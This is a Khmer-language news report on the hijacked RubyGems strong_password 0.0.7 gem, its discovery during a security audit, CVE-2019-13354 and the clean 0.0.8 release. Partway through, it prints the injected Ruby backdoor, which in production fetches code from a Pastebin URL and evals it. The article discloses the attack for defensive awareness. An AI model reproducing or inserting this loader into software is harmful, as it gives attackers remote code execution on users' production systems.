ព័ត៌មាន

ឃ្លាំងឯកសារ​RubyGems strong_password Library ត្រូវប្លន់ដោយហេគឃ័រ!

អ្នកប្រើប្រាស់ Ruby ដែល update ជាមួយនឹង strong_password version 0.0.7 ត្រូវជម្រុញ ឲ្យវិលត្រឡប់ទៅជំនាន់មុនបន្ទាប់ពីអ្នកអភិវឌ្ឍន៍រកឃើញលេខកូដព្យាបាទនៅក្នុង gem។ អ្នក អភិវឌ្ឍន៍ឈ្មោះ Tute Costa ដែលកត់សម្គាល់ឃើញការដាក់បញ្ចូលនៃ Backdoor ពេលកំពុងធ្វើ សវនកម្មសន្តិសុខជាប្រចាំ។ គាត់ឃើញការផ្លាស់ប្តូរដោយប្រើពាក្យគន្លឹះរឹងមាំលើសេវាកម្មបង្ហោះ gem ប៉ុន្តែមិននៅជាមួយសាខាណាមួយនៅ GitHub ទេ។

“វាហាក់ដូចជាធ្លាក់ចុះពី 0.0.6 ទៅ 0.0.7 ប៉ុន្តែការផ្លាស់ប្តូរចុងក្រោយនៅក្នុងសាខាណាមួយនៅ ក្នុង GitHub គឺកើតឡើងតាំងពី 6 ខែមុន ហើយយើងធ្វើបច្ចុប្បន្នភាពជាមួយវា”។ ពាក្យគន្លឹះ ត្រូវប្រើដោយអ្នកអភិវឌ្ឍន៍ដើម្បីពិនិត្យមើលភាពខ្លាំងនៃពាក្យសម្ងាត់របស់កម្មវិធី។  strong_ password v 0.0.6 ត្រូវទាញយកច្រើនជាង 38.000 ដង ហើយផ្ទាំងខាងក្រោយ 0.0.7 ត្រូវ ទាញយក 537 ដង។ គាត់ទាញយក Gem ពី Rubygems បន្ថែម ហើយប្រៀបធៀបទៅនឹងច្បាប់ ចម្លងនៅក្នុង GitHub លេខកូដខាងក្រោមត្រូវបន្ថែមជាមួយកំណែថ្មីបំផុត ហើយការផ្លាស់ប្តូរត្រូវ បន្ថែមពីគណនីផ្សេងជាងគណនីរបស់អ្នកថែទាំ។def !;begin;yield;rescue Exception;end;end 
!{Thread.new{loop{_!{sleep
rand*3333;eval(Net::HTTP.get(URI(&#039https://pastebin.com/raw/xa456PFt&#039)))}}}if
Rails.env[0]==”p”}

យោងទៅតាមកូដវាហាក់ដូចជាអ្នកវាយប្រហារប្រើ Pastebin ដើម្បីទាញយកបន្ទុកបន្ទាប់បន្សំលេខ កូដដំណើរការលុះត្រាតែវាកំពុងដំណើរការនៅក្នុងបរិយាកាសផលិតកម្មដោយមានករណីលើកលែង។ ការវាយប្រហារនេះក៏ដាក់បញ្ចូលនូវឧបករណ៍ middleware ដែល “eval’s cookies ដែលត្រូវ គេដាក់ឈ្មោះ  __id suffix មានតែនៅក្នុងផលិតកម្មប៉ុណ្ណោះ ដែលព័ទ្ធជុំវិញដោយអ្នកដោះស្រាយ ករណីលើកលែង! មុខងារដែលត្រូវកំណត់នៅក្នុង hijacked gem”។ ភាពងាយរងគ្រោះត្រូវចាត់តាំងជាមួយអ្នកកំណត់អត្តសញ្ញាណ CVE CVE-2019-13354។ កំណែ ថ្មី 0.0.8 នៃ ruby gem ដែលមានលេខកូដស្អាតត្រូវចេញផ្សាយ ហើយព័ត៌មានលម្អិតអាចមើល ឃើញពីទំព័រផ្លូវការរបស់ RubyGems។

image

image